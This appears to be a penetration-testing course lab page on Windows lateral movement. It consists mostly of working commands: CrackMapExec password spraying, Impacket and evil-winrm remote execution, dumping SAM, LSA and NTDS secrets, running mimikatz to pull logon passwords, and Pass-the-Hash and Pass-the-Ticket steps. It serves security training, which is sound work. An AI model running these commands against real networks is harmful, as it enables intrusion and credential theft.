Exam objective: 5.2 Lateral movement — pivoting, WMI, WinRM, SMB/RDP/SSH, LDAP, FTP, Telnet, HTTP(S); tools CME, Impacket, PsExec, mimikatz.
In this lab you will use CrackMapExec / NetExec and the Impacket suite to move laterally across a Windows network using captured credentials. Re-use the AD lab from Lab 26.
Reachable hosts:
crackmapexec smb 10.0.0.0/24Output gives OS, hostname, signing status. Test the captured svc_sql : Summer2025 everywhere:
crackmapexec smb 10.0.0.0/24 -u svc_sql -p 'Summer2025'Look for Pwn3d! — that means local admin.
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --shares
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --users
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --pass-pol
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --loggedon-userscrackmapexec smb <ip> -u svc_sql -p 'Summer2025' -x 'whoami /all'
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --exec-method smbexec -x 'ipconfig'Methods: smbexec, wmiexec, atexec, mmcexec — try each if one is blocked.
impacket-psexec corp.local/svc_sql:Summer2025@<ip>
impacket-wmiexec corp.local/svc_sql:Summer2025@<ip>
impacket-atexec corp.local/svc_sql:Summer2025@<ip> 'whoami'
evil-winrm -i <ip> -u svc_sql -p 'Summer2025'WinRM (5985/5986) is the cleanest — evil-winrm gives a full PowerShell shell with file upload and Invoke-Binary for reflective loading.
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --sam
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --lsa
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --ntds # only on DCOr from an interactive session:
evil-winrm> upload mimikatz.exe
evil-winrm> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
crackmapexec smb <ip> -u Administrator -H <NT-hash> --local-auth
impacket-psexec -hashes :<NT-hash> corp.local/Administrator@<ip>If signing isn't enforced, Pass-the-Hash works as if you had the password.
Convert a TGT/TGS into a usable Kerberos ticket:
export KRB5CCNAME=ticket.ccache
impacket-psexec -k -no-pass corp.local/svc_sql@target.corp.local| Port | Tool |
|---|---|
| 22 SSH | ssh, sshpass |
| 23 Telnet | telnet, nc |
| 80/443 HTTP | curl, httpx |
| 135 RPC | impacket-rpcdump |
| 139/445 SMB | crackmapexec, smbclient |
| 389/636 LDAP | ldapsearch, windapsearch |
| 1433 MSSQL | impacket-mssqlclient |
| 3306 MySQL | mysql client |
| 3389 RDP | xfreerdp, rdesktop |
| 5985/5986 WinRM | evil-winrm |
- How CrackMapExec / NetExec sprays creds across a subnet to find admin reuse.
- Five Impacket execution methods (
psexec,wmiexec,atexec,smbexec,mssqlclient). - Pass-the-Hash and Pass-the-Ticket workflows.
- The lateral-movement port → tool cheatsheet.